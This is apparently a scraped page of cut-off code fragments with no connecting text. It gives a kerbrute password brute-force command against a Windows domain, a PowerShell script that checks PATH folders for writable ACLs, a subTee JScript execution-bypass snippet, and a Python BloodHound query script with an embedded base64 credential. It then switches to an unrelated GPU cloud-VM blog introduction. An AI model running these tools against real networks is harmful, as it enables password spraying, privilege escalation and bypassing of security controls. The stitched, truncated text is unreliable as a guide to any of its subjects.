With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { | |
Write-Warning "This script will not function with administrative privileges. Please run as a normal user." | |
Break | |
} | |
$outfile = "acltestfile" | |
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";") | |
Foreach ($path in $paths) { | |
# This prints a table of ACLs | |
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights |
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Windows\\System32\\Tasks'; | |
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" | |
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager"; | |
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; | |
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <dependency><dependentAssembly> <assemblyIdentity name="tasks" version="0.0.0.0"/> </dependentAssembly> </dependency> <assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" ru |
[DllImport("shell32.dll", SetLastError = true)] | |
static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs); | |
public static string[] CommandLineToArgs(string commandLine) | |
{ | |
int argc; | |
var argv = CommandLineToArgvW(commandLine, out argc); | |
if (argv == IntPtr.Zero) | |
throw new System.ComponentModel.Win32Exception(); | |
try |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/usr/bin/python | |
import sys, json, urllib, urllib2 | |
#Define the Bloodhound Database | |
url = 'http://bloodhound-server:7474/db/data/cypher/' | |
#Define the Bloodhound Credentials | |
#echo neo4j:bloodhound | base64 | |
base64auth = 'bmVvNGo6Ymxvb2Rob3VuZA==' | |
request = urllib2.Request(url) |
In February 2017, Google announced the availability GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.
Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.